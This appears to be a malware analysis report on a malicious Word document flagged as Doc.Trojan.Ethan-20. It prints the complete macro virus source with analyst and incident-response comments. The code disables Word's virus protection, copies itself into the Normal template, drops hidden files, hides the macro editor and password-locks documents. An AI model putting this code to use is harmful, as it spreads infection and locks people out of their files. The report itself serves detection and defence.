Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b383465085ec1f76…

MALICIOUS

Office (OLE)

30.0 KB Created: 2001-02-06 12:46:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 44a0044b6e68c321e1dda3737e1b5049 SHA-1: 21d5488ba3892a53c85915aa71e6dd382e13f838 SHA-256: b383465085ec1f769417ec5bcc010c444b28bfc8aa0e14cdb5ca699036e81500
Risk Score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing VBA macros that execute when the document is opened (Document_Open) and closed (Document_Close). The Document_Close macro attempts to write its own source code to 'c:\windows\system\vmm32\NVMB.vxd' and to copy it into the Normal template or the active document, suggesting an attempt to establish persistence or deploy a secondary payload. The ClamAV detection 'Doc.Trojan.Ethan-20' further supports its malicious nature.

Heuristics 3

  • ClamAV: Doc.Trojan.Ethan-20 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ethan-20
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11998 bytes
SHA-256: 0008dc71df3fb9f079e7066e70bc5f6c14ded9061a8213afd87204aae552cd32
Preview script
First 1,000 lines of the extracted script
' Module attributes as exported by the olevba extractor. VB_Name shows this is
' the document's ThisDocument class module, so the Document_Open / Document_Close
' procedures below are auto-run event handlers: opening or closing the file is
' the only trigger the code needs.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Document_Close: runs when the document is closed. On Error Resume Next hides
' every failure, so partial execution (and no error dialog) is expected on a
' host where any step is blocked. Analyst summary of the visible code:
'   1. Turns off Word's macro virus warning and save prompts (Options blocks).
'   2. Drops this module's source to c:\windows\system\vmm32\NVMB.vxd (hidden +
'      system attributes) if that file does not already exist.
'   3. Copies the dropped source into the Normal template (global persistence)
'      or, if Normal already carries the marker, into the active document.
'   4. Seasonal payload (month >= 11 and day > 5): rewrites word 25 of the
'      document and, unless the file name starts with "DMB", sets a random
'      write password that is logged to c:\pass.sys.
' IR notes: the VXD path, c:\pass.sys and the marker string assigned to sss are
' file/content indicators; a Normal template whose first module begins with
' "Private Sub Document_Close()" means the host is already infected.
Private Sub Document_Close()
On Error Resume Next
' Infection marker: the first line of a target module is compared against this
' string below to decide whether NormalTemplate / ActiveDocument already carry
' the code.
sss = "Private Sub Document_Close()"
' Not -1 evaluates to 0, so the user cannot interrupt the macro with Ctrl+Break.
Application.EnableCancelKey = Not -1
' VirusProtection = 0 disables Word's macro warning; the other settings suppress
' prompts so the modified Normal template can be saved silently.
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0:  .BackgroundSave = True: End With
' Re-saves the document under its own name, keeping the macro in the file.
 ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
Randomize
' Dir(..., 6): 6 = vbHidden (2) + vbSystem (4), so the check also sees a
' hidden/system copy. The drop file is written only when it is absent.
If Dir("c:\windows\system\vmm32\NVMB.vxd", 6) = "" Then
Open "c:\windows\system\vmm32\NVMB.vxd" For Output As #1
' MacroContainer is the document/template that holds the running macro; its
' first VBComponent (this module, per the VB_Name attribute) is dumped line by
' line. The ".vxd" extension is cosmetic: the file is plain-text VBA source.
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
Print #1, a
Next i
Close #1
' Same attribute value as the Dir() call: hidden + system, so the drop file is
' not shown by default in Explorer.
SetAttr "c:\windows\system\vmm32\NVMB.vxd", 6
End If
' Target selection for replication: prefer the Normal template (affects every
' future document); if it is already marked, fall back to the active document;
' if both are marked, t stays "" and nothing is copied.
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> sss Then
    Set t = NormalTemplate.VBProject.VBComponents.Item(1)
Else
If ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> sss Then
    Set t = ActiveDocument.VBProject.VBComponents.Item(1)
  Else
    t = ""
End If
End If
If t <> "" Then
' Replication: reads the drop file back and inserts it line by line at the top
' of the chosen module, i.e. it propagates from the on-disk copy, not from
' memory. An empty drop file skips the copy. On current Office versions,
' programmatic VBProject access is blocked unless "Trust access to the VBA
' project object model" is enabled, so these calls would fail silently here.
Open "c:\windows\system\vmm32\NVMB.vxd" For Input As #1
If LOF(1) = 0 Then GoTo q
i = 1
Do While Not EOF(1)
Line Input #1, a
t.CodeModule.InsertLines i, a
i = i + 1
Loop
q:
Close #1
End If
' Exclusion list: two user names skip the payload (both appear here as Cyrillic
' text rendered in the wrong code page). Likely the author's/test accounts;
' replication above still runs for them.
If Application.UserName = "ÍĎ ŃĎŃ" Or Application.UserName = "Ôčëčďďĺíęî" Then

Else
Set myDoc = ActiveDocument
' Date trigger: payload fires from 6 November onward each year.
If Month(Now()) >= 11 And Day(Now()) > 5 Then
' Visible payload: replaces the 25th word with a "New Year NVMB" banner in
' Tahoma 16 with the Las Vegas Lights animation -- the most likely symptom a
' user would report.
   With Application.ActiveWindow.Document.Words.Item(25)
       .Text = Chr(13) + " With New Year   N V M B !!!  " + Chr(13)
       .Select
       .Font.Name = "Tahoma"
       .Font.Size = 16
       .Font.Animation = wdAnimationLasVegasLights
   End With
' Lock-out payload, skipped for documents whose name starts with "DMB": picks a
' random line (1-60) of this module, keeps a random prefix (1-10 chars; may be
' shorter or empty if the line is short or blank), appends the document name
' and that value to c:\pass.sys, then uses it as the write password. A victim
' locked out of editing can recover the password from c:\pass.sys.
If Left(ActiveDocument.Name, 3) <> "DMB" Then
   i = Int((60 * Rnd) + 1)
   pass = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
   Count = Int((10 * Rnd) + 1)
   pass = Left(pass, Count)
   Open "c:\pass.sys" For Append As #1
   Print #1, ActiveDocument.Name
   Print #1, pass
   Close #1
   myDoc.WritePassword = pass
   With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0:  .BackgroundSave = True:  End With
End If
End If
End If
' Repeated on every exit path so the prompt/warning settings stay disabled.
 With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0:  .BackgroundSave = True:  End With
End Sub
' Document_Open: runs when the document is opened. No replication happens here;
' the only action is defense evasion in the Word UI. The menu captions are shown
' mis-encoded (Cyrillic in the wrong code page), which suggests the code targets
' a Russian-localized Word: it walks the Tools > Macro submenu and hides and
' disables three entries whose captions appear to be the Visual Basic Editor,
' Start Recording... and Macros... commands, so the user cannot reach the VBE
' from the menu to inspect this module. On a differently localized Word the
' lookups fail and On Error Resume Next swallows the errors, so the hiding is
' a no-op there. IR note: a missing Tools > Macro > Visual Basic Editor entry
' on an affected host is a cheap visual indicator of this sample.
Private Sub Document_Open()
On Error Resume Next
' Same prompt/warning suppression as in Document_Close.
 With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0:  .BackgroundSave = True:  End With
Dim ee As CommandBarPopup
' ee = the Tools menu (caption mis-encoded); the Macro submenu is enabled first
' so its child controls can be enumerated.
Set ee = Application.CommandBars("Menu Bar").Controls("&Ńĺđâčń")
ee.CommandBar.Controls("&Ěŕęđîń").Enabled = True
Dim S1 As CommandBarPopup
Set S1 = ee.CommandBar.Controls("&Ěŕęđîń")
' Hide and disable the three matching entries; other submenu items are left
' untouched.
For q = 1 To S1.Controls.Count
   If S1.CommandBar.Controls.Item(q).Caption = "&Đĺäŕęňîđ Visual Basic" Or S1.CommandBar.Controls.Item(q).Caption = "&Íŕ÷ŕňü çŕďčńü..." Or S1.CommandBar.Controls.Item(q).Caption = "&Ěŕęđîńű..." Then
      S1.CommandBar.Controls.Item(q).Visible = False
      S1.CommandBar.Controls.Item(q).Enabled = False
   End If
Next q
End Sub


' Processing file: /opt/analyzer/scan_staging/a8b47ac539ae46a2a42ae3f4e02aed0b.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5548 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	LitStr 0x001C "Private Sub Document_Close()"
' 	St sss 
' Line #3:
' 	LitDI2 0x0001 
' 	UMi 
' 	Not 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #4:
' 	StartWithExpr 
' 	Ld Options 
' 	With 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith ConfirmConversions 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith VirusProtection 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith SaveNormalPrompt 
' 	BoS 0x0055 
' 	LitVarSpecial (True)
' 	MemStWith BackgroundSave 
' 	BoS 0x0000 
' 	EndWith 
'
... (truncated)